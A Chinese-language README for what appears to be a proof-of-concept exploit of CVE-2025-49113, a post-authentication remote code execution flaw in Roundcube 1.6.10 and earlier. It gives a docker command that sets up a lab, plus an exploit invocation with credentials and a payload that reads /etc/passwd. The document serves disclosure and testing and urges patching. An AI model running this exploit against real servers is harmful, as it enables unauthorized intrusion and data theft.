在Roundcube(版本≤1.6.10)中发现了一个严重后认证远程代码执行漏洞,由不安全的PHP对象反序列化引起。这一严重缺陷已在代码库中悄然存在超过10年。
完整技术分析和利用详情请访问:
👉 https://fearsoff.org/research/roundcube
这将在Docker容器中安装Ubuntu 24.04、Roundcube及所有必要依赖项:
docker run --name ubuntu24 \
-p 9876:80 \
-v "$PWD/rc_install.sh":/root/rc_install.sh \
-it ubuntu:24.04 \
bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"
⚠️ 注意:仅限在隔离环境中使用。不要将有漏洞的实例暴露到公共互联网。
此概念验证代码仅供教育和研究目的使用。作者和贡献者不对因使用本代码而产生的任何误用或损害承担责任。在您不拥有或未经明确许可测试的系统上未经授权使用是非法的,并严格禁止。
确保系统已安装 php
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"
如果您正在运行Roundcube ≤ 1.6.10,请立即更新至最新修补版本以消除此漏洞。
本项目及关联文档在MIT许可证下提供。